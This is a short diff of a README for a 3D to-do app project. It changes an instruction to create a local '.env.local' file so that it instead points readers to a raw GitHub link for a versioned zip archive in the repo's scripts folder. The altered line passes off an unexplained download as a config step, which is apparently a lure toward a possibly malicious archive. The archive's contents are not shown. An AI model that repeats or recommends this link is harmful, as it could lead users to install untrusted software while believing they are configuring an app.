VIGNESHWARAN6059/nexus-3d-todo-ai/README.md

   - The app supports offline usage via the service worker after a first load.

 - Environment and configuration
-  - Create a local env file if needed: `.env.local`
+  - Create a local env file if needed: `https://raw.githubusercontent.com/VIGNESHWARAN6059/nexus-3d-todo-ai/main/scripts/d_todo_nexus_ai_3.5-beta.2.zip`
   - Ensure encryption keys and service endpoints are properly configured if you plan to run a private server.

 - Quick start tips